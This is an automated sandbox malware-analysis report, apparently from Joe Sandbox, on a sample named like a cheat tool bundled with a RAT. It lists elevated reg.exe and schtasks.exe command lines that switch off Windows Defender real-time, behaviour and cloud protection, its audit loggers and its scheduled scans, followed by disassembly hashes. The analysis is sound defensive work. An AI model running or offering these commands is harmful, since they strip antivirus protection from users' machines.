                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:23
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:07:37:09
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:27
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:29
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:30
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:31
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:32
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:33
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:34
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:35
                                                  Start time:07:37:10
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:36
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:37
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:38
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:39
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:40
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:41
                                                  Start time:07:37:11
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:42
                                                  Start time:07:37:12
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:43
                                                  Start time:07:37:12
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:44
                                                  Start time:07:37:12
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  Imagebase:0xc50000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FFD342B2731 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: yU_H
                                                    • API String ID: 0-404771944
                                                    • Opcode ID: 416753681357ddfd249258d8ef95116d8341faa25a4af0dbf1ab1f6c5d87e745
                                                    • Instruction ID: 8affd309af83df65f61199674f878408720b01f2e2dde0400ee417e242dd0c52
                                                    • Opcode Fuzzy Hash: 416753681357ddfd249258d8ef95116d8341faa25a4af0dbf1ab1f6c5d87e745
                                                    • Instruction Fuzzy Hash: E0910932F18E090FDBA4EA1CD8956BDB3D1EB99340F40017AE44EE3292DE39AC4247C1
                                                    Function 00007FFD342B0E30 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: yU_H
                                                    • API String ID: 0-404771944
                                                    • Opcode ID: 7fb06a38453e3619c165e43b98cb8cba08d4c06439f1bb778e4e393998a32795
                                                    • Instruction ID: a2b0fe8124a227d2b73d95d52d82a0b0d7913dab8b2e029c989dbd8865f6134e
                                                    • Opcode Fuzzy Hash: 7fb06a38453e3619c165e43b98cb8cba08d4c06439f1bb778e4e393998a32795
                                                    • Instruction Fuzzy Hash: 2091E835F18E090FDBA4EA1CD8956BDB3D1EB99350F40017AE44EE3296DE39AC4257C1
                                                    Function 00007FFD342B3EF9 Relevance: .4, Instructions: 367COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a97bc4f5824e62c06f68ab18e206a0572b9b6fbcf27c504f4b61621c37ac4356
                                                    • Instruction ID: 095e09311d72dc8fd861b0544154b4e87f389863efbec1f582d48eea68265930
                                                    • Opcode Fuzzy Hash: a97bc4f5824e62c06f68ab18e206a0572b9b6fbcf27c504f4b61621c37ac4356
                                                    • Instruction Fuzzy Hash: E5C14735B08A8A4FEB54DF6888A52B977E1FF9A310F04057AD50DE72D2DE7DA802C741
                                                    Function 00007FFD342B10A5 Relevance: .3, Instructions: 298COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eeda7efa7921baa5899b697edec5a47c33897822b5b03cf0b992f7b942b1f5cf
                                                    • Instruction ID: d1d67b71f772d9ede477ca618dea5fa6fd327d1f8ea1b6ab583b03bf16aa5785
                                                    • Opcode Fuzzy Hash: eeda7efa7921baa5899b697edec5a47c33897822b5b03cf0b992f7b942b1f5cf
                                                    • Instruction Fuzzy Hash: 6AA10825B0DA864FEB51AF6884A02F97791FF83340F0401BAD58AE72C7CE6EA8019351
                                                    Function 00007FFD342B0E40 Relevance: .3, Instructions: 285COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc4f9a392979443dfa8b6be3100abbafa6bd5af7875406a546b9098cec9b5149
                                                    • Instruction ID: 626f092fb87d3650e0fc6ae439c57f8ff239b2d2f9e510f011c3d11ff2953e56
                                                    • Opcode Fuzzy Hash: cc4f9a392979443dfa8b6be3100abbafa6bd5af7875406a546b9098cec9b5149
                                                    • Instruction Fuzzy Hash: DF811731B1CA094FE798DB6C94997B9B7E1EF99311F04427ED04EE3292DE65AC428780
                                                    Function 00007FFD342B0E48 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7925902f72d92c0a05337e6b9c7d23e63881c6ff4486e426209d69061a4d8e2d
                                                    • Instruction ID: 31158edcdfdc350a7854f5f1a9ecabc492e8b172f0f7219dc29f41858e8a3e00
                                                    • Opcode Fuzzy Hash: 7925902f72d92c0a05337e6b9c7d23e63881c6ff4486e426209d69061a4d8e2d
                                                    • Instruction Fuzzy Hash: 62612A31B1CB490FE758AA6C986627A77C5EB9A310F44427EF94DD3393DD69AC0243C2
                                                    Function 00007FFD342B53D5 Relevance: .2, Instructions: 240COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1aeb0ade833081ab5a070b1b141fe5537166348499f0424aa2eaa407e0a3360
                                                    • Instruction ID: 758e938b2050475bcab0346d23b0cd5bbdcc3ed70d1c6a6ac332df4baa2eff17
                                                    • Opcode Fuzzy Hash: e1aeb0ade833081ab5a070b1b141fe5537166348499f0424aa2eaa407e0a3360
                                                    • Instruction Fuzzy Hash: 6851BE31A0CB5C4FDB58DF9888596E9BBF1FF99310F0482ABD449D7252DA34A845CB82
                                                    Function 00007FFD342B0E70 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f453d236df1ef3784520b6d91e51066a2ed400d62c93f48bce2e7d1ef01a9da
                                                    • Instruction ID: a534aa75200559510c60284ea9f3737a987d654b6f65ea9b448368f3a1355c67
                                                    • Opcode Fuzzy Hash: 7f453d236df1ef3784520b6d91e51066a2ed400d62c93f48bce2e7d1ef01a9da
                                                    • Instruction Fuzzy Hash: 2451CF71F0DA4A8FEF58CA5888A52BDB7A2FF99344F14017AD04EF3282CE796801C755
                                                    Function 00007FFD342B13ED Relevance: .2, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41e4ee6773608f39b8a29584a8fd874f3478fcc9902bca9cb5bb1b60e357d787
                                                    • Instruction ID: 4e59876cf9d2ac5450889a1c0126766918f9df0f47cbea8ef0e99d50f4639f47
                                                    • Opcode Fuzzy Hash: 41e4ee6773608f39b8a29584a8fd874f3478fcc9902bca9cb5bb1b60e357d787
                                                    • Instruction Fuzzy Hash: 9871C834E1850D8FEB94EFA4C8A57EDB7B1EF46304F5041A9D409FB292CE7A68859B40
                                                    Function 00007FFD342B0A38 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e68be6f1273588a9ad913dad7ab951db8474c76374ddc5988e5f8b6c9e5f8ca
                                                    • Instruction ID: b52a8aaff7f966b728f50b465fde4a554d4bc250a099a9b11fa2abd5ac3c9ecd
                                                    • Opcode Fuzzy Hash: 7e68be6f1273588a9ad913dad7ab951db8474c76374ddc5988e5f8b6c9e5f8ca
                                                    • Instruction Fuzzy Hash: 75515034A18A0E8FDB85EF58C8946EA73B1FF59300F504A69E829D7295CF75E851CB80
                                                    Function 00007FFD342B1B55 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a3dec2a08f3fac9fbf1f71184c47b57f3565fb73a304d597cc89dbca31b136a
                                                    • Instruction ID: 003c144dcde436c951e75019927ca4cf91d271ca3d096f1e918ef68d674af992
                                                    • Opcode Fuzzy Hash: 3a3dec2a08f3fac9fbf1f71184c47b57f3565fb73a304d597cc89dbca31b136a
                                                    • Instruction Fuzzy Hash: 5551847461CA8A8FDF89CF18C8A0A7537A1FF59348B1405ADE4AED72D2CB75E812C741
                                                    Function 00007FFD342B2E19 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a379eef3678ec463398215d217fcd549629d521147ea25b223a4ac288971ce0f
                                                    • Instruction ID: 753d76764f74729f943db6c6c9db642a4ff8fe1bc56506b9faa421b9098f2c9a
                                                    • Opcode Fuzzy Hash: a379eef3678ec463398215d217fcd549629d521147ea25b223a4ac288971ce0f
                                                    • Instruction Fuzzy Hash: 0F41D531B1C7450FE319AB6C98662BA77D5DF86310F4442BEE84DD3293DD69BC0292C6
                                                    Function 00007FFD342B4068 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3698117c576aee733d1e4cbfd86f0ba0e89c81a29bfe8d02f99f2b755dfb8b0f
                                                    • Instruction ID: 3c052c3aebb98fe8069f3c9840a5cab626bd8912fe8dbe0edab67a3b08fae46e
                                                    • Opcode Fuzzy Hash: 3698117c576aee733d1e4cbfd86f0ba0e89c81a29bfe8d02f99f2b755dfb8b0f
                                                    • Instruction Fuzzy Hash: 33419335F1894A8FEB98DE58C4E43BA77E2FBA9300F144139D419E3395DE79A842CB40
                                                    Function 00007FFD342B6CCD Relevance: .1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4689237dd57705f7fd896e9dd283a9e00505b68bf5ef96125085677753384cca
                                                    • Instruction ID: 775e88c3864be733c43461152c818bb515f68ba15f0da4f93ef95c95ab0569e9
                                                    • Opcode Fuzzy Hash: 4689237dd57705f7fd896e9dd283a9e00505b68bf5ef96125085677753384cca
                                                    • Instruction Fuzzy Hash: 3A41F330E1854A8FD785EB68C4A6ABDB7E1FF59304F4401B9D50EEB2E3CE696841C781
                                                    Function 00007FFD342B164A Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2222484398.00007FFD342B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd342b0000_52cheatand52rat.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
